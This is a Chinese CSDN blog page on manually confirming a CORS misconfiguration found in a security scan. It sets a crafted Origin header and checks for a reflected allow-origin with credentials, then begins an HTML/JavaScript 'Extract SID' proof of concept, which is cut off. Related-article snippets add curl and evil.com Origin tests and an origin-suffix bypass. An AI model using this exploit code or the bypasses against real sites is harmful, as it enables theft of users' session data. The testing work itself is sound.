一次CORS漏洞的手工验证

最新推荐文章于 2024-06-03 09:35:12 发布
最新推荐文章于 2024-06-03 09:35:12 发布
阅读量5k 收藏 9
点赞数 3
分类专栏: 安全 文章标签: 前端 安全 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/midsummer411/article/details/122324738
版权
本文介绍了在进行安全扫描时发现CORS漏洞后如何手工验证,通过在API请求中添加特定headers来检查漏洞存在性。同时,文章提供了一个POC代码示例,警示了若攻击者利用此漏洞可能引发的危害,如数据泄露或IP误导。并以百度的安全设置为例,提出修复方法,包括无弹出框和隐藏的POC代码,以增强前端接口的安全性。
摘要由CSDN通过智能技术生成

给项目接口做安全扫描的时候,发现有个CORS漏洞:
在这里插入图片描述
但仅仅扫出来还不够,需要手工验证一下

手工验证方式

在正常的api请求处,headers加入"origin":"http://xx.xx.xx.xx", 如果接口正常返回了数据且headers里包含

access-control-allow-credentials : true
access-control-allow-origin : http://xx.xx.xx.xx

就说明这个接口确实存在CORS漏洞

poc代码

<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    console.log(xhttp.responseText);
    if (this.readyState == 4 && this.status == 200) {
    
最低0.47元/天 解锁文章
Flutter&Python&Test
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CORS跨域资源共享漏洞验证测试
afei001
01-17 3283
目录 1.前言 2.CORS漏洞概述 3.漏洞验证 3.1 curl指定Origin验证 3.2 Burpsuite抓包验证 3.3 CORS_Scanner工具验证 4.CORS_POC.html 5.漏洞修复 1.前言 之前在对网站进行安全性测试时,使用AWVS漏扫发现存在一个CORS跨域资源共享漏洞。记录一下验证及修复方式。 afei 漏洞等级:高危 2.CORS漏洞概述 CORS(跨源资源共享)定义了一种机制来支持客户端跨源...
跨域资源共享 CORS 详解
09-02
所有浏览器都支持该功能IE浏览器不能低于IE10.整个CORS通信过程都是浏览器自动完成不需要用户参与。对于开发者来说CORS通信与同源的AJAX通信没有差别代码完全一样浏览器一旦发现AJAX请求跨源就会自动添加一些附加的头信息有时还会多出一次附加的请求,但用户不会有感觉。
安全测试 之 常见安全漏洞CORS
最新发布
Orange_hhh的博客
06-03 637
CORS:(Cross-origin resource sharing)跨域资源共享,CORS是一种机制,这种机制通过在http头部添加字段,通常情况下,web应用A告诉浏览器,自己有权限访问应用B。这样就可以解决跨源的问题了。
cors漏洞验证
山兔的博客
04-09 271
在请求体当中添加Origin: https://evil.com请求头,看响应包里面有没有Access-Control-Allow-Origin: https://evil.com,有的话就说明存在这个漏洞
跨域资源共享(CORS)-漏洞整理
weixin_30865427的博客
07-28 459
绕过方法整理 绕过 - 仅对域名校验 #POC #"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow- Credentials: true". #Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: ht...
CORS漏洞利用检测和利用方式
凝聚力安全团队
09-01 4909
CORS漏洞利用检测和利用方式 CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求。 检测方式: 1.curl访问网站 curl https://www.junsec.com -H "Origin: https://test.com" -I 检查返回包的 Access-Control-Allow-Origin 字段是否为https://test.com 2.burpsuite发送请求包,
CORS跨域漏洞
weixin_46627652的博客
04-20 3978
Web服务端CORS(跨域资源共享)错误配置,无法正确验证Origin头,任何网站都可以发出使用用户凭据发出的请求,并读取对这些请求的响应,信任任意来源可以有效地禁用同源策略,从而允许第三方网站进行双向交互,易导致敏感信息泄露。抓取上述漏洞地址的请求包,构造Origin字段,并将Origin头参数值设为恶意域名,服务端返回的Access-Control-Allow-Origin字段值为修改的恶意域名,判断服务端并未正确处理跨域请求。(1)如果没有必要就不要开启CORS。(2)严格限制域白名单,而不是使用*
CORS跨域资源共享漏洞
m0_55772907的博客
10-19 9291
cors漏洞
浅析CORS攻击及其挖洞思路
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
11-30 1593
0x1 CORS机制   CORS全名跨域资源共享(Cross-Origin-Resourece-sharing),该机制主要是解决浏览器同源策略所带来的不便,使不同域的应用能够无视同源策略,进行信息传递。 引用一张图能很好地说明CORS机制的作用 0x2 CORS机制实现 那么这个机制是怎么发挥作用的呢? CORS的标准定义是:通过设置http头部字段,让客户端有资格跨域访问资源。通过服务器的验证和授权之后,浏览器有责任支持这些http头部字段并且确保能够正确的施加限制。 为了更好理解
4.常见web安全漏洞与加固
asdf390的博客
05-07 1047
SQL 注入漏洞的影响可以归纳为以下4 个方面。 目前,大多数网站都以数据库为驱动,这进一步增加了SQL 注入漏洞产生的可能性,因此对于涉及SQL 的相关操作,需要格外注意。 2.SQL 注入分类 SQL 注入可以按照不同的分类方式分为多种类型,如通过参数类型、注入位置等,下文将详细介绍不同的分类方式及一些重要的注入类型。 按照输入参数的类型不同,可以将SQL 注入分为数字型注入和字符型注入。 这两种注入的最大区别在于,字符型注入一般要使用单引号进行闭合,而数字型注入不需要...
Find-Sec-Bugs 漏洞范例
热门推荐
zhaohonghan的博客
04-03 1万+
Find-Sec-Bugs 漏洞范例 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
CORS——从理解到验证
wonain的博客
05-03 2472
CORS的本质 CORS (Cross-Origin Resource Sharing跨源资源共享) 是一种认证机制,是 W3C (万维网联盟) 推荐的一种用于跨域资源访问的安全策略。 源与同源策略 CORS 中的源指的是某个URL中的协议、域名和端口,由这三个元素标识一个唯一的源,如 http://localhost:8080 和 https://localhost:8000 是不同的源,因为它...
CORS跨域访问漏洞
m0_73896875的博客
07-13 5823
全称是“跨域资源访问共享”(Cross-Origin Resource Sharing),是一种用于解决跨域资源访问限制的机制。它允许在浏览器中进行跨域请求,并控制跨域请求的安全性。同源策略(Same-Origin Policy)是浏览器的一种安全策略,它要求在访问资源时,请求的域名、协议和端口必须与资源所在的域名、协议和端口完全匹配。如果两个资源的域名、协议和端口不匹配,浏览器会限制跨域请求,并阻止脚本访问返回的响应数据。CORS 提供了一种机制,允许服务器端声明它所支持的跨域请求。
Cors漏洞详解
Askshhbs的博客
04-26 9833
Cors介绍 Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。 Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。 漏洞原理 Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三
1.手动挖掘漏洞,详细解说,明实验和使用 (身份验证
qq_41860876的博客
09-14 890
任务086:手动漏洞挖掘(二) 这个是我的看的教程的笔记 身份认证 1.常用弱口令/基于字典密码爆破 2.账号锁定 3.信息收集 手机号 密码错误提示 4.密码嗅探 常用弱口令/基于字典密码爆破 就是像网站登陆账号密码了列账号admin密码123456 账号锁定就是连续密码错误就不在登陆了 信息收集1.手机号像出来的账号里手机号什么什么的排名像18272xxxx15就号找到这个账号2.密码错误...
cors漏洞笔记
eatrys的博客
04-11 505
cors漏洞 cors称为跨域资源共享 它的诞生主要是解决浏览器的同源策略 同源策略又是什么呢 同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现 同源策略(same origin policy) SOP 可以理解为是浏览器...
CORS 跨域资源共享漏洞
weixin_45653478的博客
03-21 1891
跨域资源共享(CORS)是一种放宽同源策略的机制,它允许浏览器向跨源服务器,发出 XMLHttpRequest 请求,从而克服了 AJAX 只能同源使用的限制,以使不同的网站可以跨域获取数据。我们先来简单分析一下 CORS 跨域获取资源的过程:CORS 定义了两种跨域请求:简单请求 和 非简单请求。简单跨域请求就是使用设定的请求方式请求数据,而非简单跨域请求则是在使用设定的请求方式请求数据之前,先发送一个 OPTIONS 预检请求,验证请求源是否为服务端允许源。
CORS安全漏洞:一项经验研究
这可能导致跨域数据泄漏、恶意脚本注入和其他安全漏洞,因为CORS的实现可能允许过于宽松的权限设置,使得攻击者有机会操纵或篡改原本受保护的数据。 2) CORS引入了新的风险形式。例如,CORS头的配置不正确或过于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值